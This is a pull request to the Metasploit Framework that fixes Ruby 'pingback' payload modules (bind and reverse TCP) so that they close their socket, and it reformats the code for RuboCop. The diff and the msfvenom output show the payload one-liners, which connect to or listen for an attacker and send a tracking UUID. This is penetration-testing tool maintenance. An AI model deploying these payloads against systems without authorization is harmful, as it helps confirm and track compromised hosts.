### PR TITLE
payloads: Ruby pingback: Resolve RuboCop violations

### DIFF
--- a/modules/payloads/singles/ruby/pingback_bind_tcp.rb
+++ b/modules/payloads/singles/ruby/pingback_bind_tcp.rb
@@ -1,7 +1,5 @@
-
 module MetasploitModule
-
-  CachedSize = 103
+  CachedSize = 110
 
   include Msf::Payload::Single
   include Msf::Payload::Ruby
@@ -9,33 +7,34 @@ module MetasploitModule
   include Msf::Payload::Pingback::Options
 
   def initialize(info = {})
-    super(merge_info(info,
-      'Name' => 'Ruby Pingback, Bind TCP',
-      'Description' => 'Listens for a connection from the attacker, sends a UUID, then terminates',
-      'Author' => 'asoto-r7',
-      'License' => MSF_LICENSE,
-      'Platform' => 'ruby',
-      'Arch' => ARCH_RUBY,
-      'Handler' => Msf::Handler::BindTcp,
-      'Session' => Msf::Sessions::Pingback,
-      'PayloadType' => 'ruby'
-    ))
+    super(
+      merge_info(
+        info,
+        'Name' => 'Ruby Pingback, Bind TCP',
+        'Description' => 'Listens for a connection from the attacker, sends a UUID, then terminates',
+        'Author' => 'asoto-r7',
+        'License' => MSF_LICENSE,
+        'Platform' => 'ruby',
+        'Arch' => ARCH_RUBY,
+        'Handler' => Msf::Handler::BindTcp,
+        'Session' => Msf::Sessions::Pingback,
+        'PayloadType' => 'ruby'
+      )
+    )
   end
 
   def generate(_opts = {})
-    #return prepends(ruby_string)
+    # return prepends(ruby_string)
     return ruby_string
   end
 
   def ruby_string
-    self.pingback_uuid ||= self.generate_pingback_uuid
+    self.pingback_uuid ||= generate_pingback_uuid
     return "require'socket';" \
       "s=TCPServer.new(#{datastore['LPORT'].to_i});"\
-      "c=s.accept;"\
-      "s.close;"\
-      "c.puts'#{[[self.pingback_uuid].pack('H*')].pack('m0')}\'.unpack('m0');"
-      "c.close"
+      'c=s.accept;'\
+      's.close;'\
+      "c.puts'#{[[self.pingback_uuid].pack('H*')].pack('m0')}\'.unpack('m0');" \
+      'c.close'
   end
 end
-
-

--- a/modules/payloads/singles/ruby/pingback_reverse_tcp.rb
+++ b/modules/payloads/singles/ruby/pingback_reverse_tcp.rb
@@ -1,7 +1,5 @@
-
 module MetasploitModule
-
-  CachedSize = 100
+  CachedSize = 107
 
   include Msf::Payload::Single
   include Msf::Payload::Ruby
@@ -9,17 +7,20 @@ module MetasploitModule
   include Msf::Payload::Pingback::Options
 
   def initialize(info = {})
-    super(merge_info(info,
-      'Name' => 'Ruby Pingback, Reverse TCP',
-      'Description' => 'Connect back to the attacker, sends a UUID, then terminates',
-      'Author' => 'asoto-r7',
-      'License' => MSF_LICENSE,
-      'Platform' => 'ruby',
-      'Arch' => ARCH_RUBY,
-      'Handler' => Msf::Handler::ReverseTcp,
-      'Session' => Msf::Sessions::Pingback,
-      'PayloadType' => 'ruby'
-    ))
+    super(
+      merge_info(
+        info,
+        'Name' => 'Ruby Pingback, Reverse TCP',
+        'Description' => 'Connect back to the attacker, sends a UUID, then terminates',
+        'Author' => 'asoto-r7',
+        'License' => MSF_LICENSE,
+        'Platform' => 'ruby',
+        'Arch' => ARCH_RUBY,
+        'Handler' => Msf::Handler::ReverseTcp,
+        'Session' => Msf::Sessions::Pingback,
+        'PayloadType' => 'ruby'
+      )
+    )
   end
 
   def generate(_opts = {})
@@ -28,12 +29,12 @@ module MetasploitModule
   end
 
   def ruby_string
-    self.pingback_uuid ||= self.generate_pingback_uuid
+    self.pingback_uuid ||= generate_pingback_uuid
     lhost = datastore['LHOST']
     lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
     return "require'socket';" \
       "c=TCPSocket.new'#{lhost}',#{datastore['LPORT'].to_i};" \
-      "c.puts'#{[[self.pingback_uuid].pack('H*')].pack('m0')}'.unpack('m0');"
-      "c.close"
+      "c.puts'#{[[self.pingback_uuid].pack('H*')].pack('m0')}'.unpack('m0');" \
+      'c.close'
   end
 end


### PR DESCRIPTION
Commit 05ffa6e4a0e292ca858f260bb3a3958529949687 chops off the final line of Ruby pingback payloads. This line is used to close the socket. This might be a size optimization, but does not appear to be intentional. Note the missing `\` for the second-last line:

https://github.com/rapid7/metasploit-framework/blob/809d87a96bfe51a2ca2a676386af81956da8a0eb/modules/payloads/singles/ruby/pingback_bind_tcp.rb#L30-L38

https://github.com/rapid7/metasploit-framework/blob/809d87a96bfe51a2ca2a676386af81956da8a0eb/modules/payloads/singles/ruby/pingback_reverse_tcp.rb#L30-L38

This PR ensures that Ruby pingback payloads will close the socket. While almost certainly a bug, the impact is negligible.

The resulting unused code was a RuboCop violation. This PR also simultaneously resolves all RuboCop violations.


# Before

```
# ./msfvenom -p ruby/pingback_bind_tcp R
[-] No platform was selected, choosing Msf::Module::Platform::Ruby from the payload
[-] No arch selected, selecting arch: ruby from the payload
No encoder specified, outputting raw payload
Payload size: 103 bytes
require'socket';s=TCPServer.new(4444);c=s.accept;s.close;c.puts'HIFJpBFsT4yTs1ze98pfEg=='.unpack('m0');
```

# After

```
# ./msfvenom -p ruby/pingback_bind_tcp R
[-] No platform was selected, choosing Msf::Module::Platform::Ruby from the payload
[-] No arch selected, selecting arch: ruby from the payload
No encoder specified, outputting raw payload
Payload size: 110 bytes
require'socket';s=TCPServer.new(4444);c=s.accept;s.close;c.puts'tbMylSh3TPmtuyT7hmi55w=='.unpack('m0');c.close
```
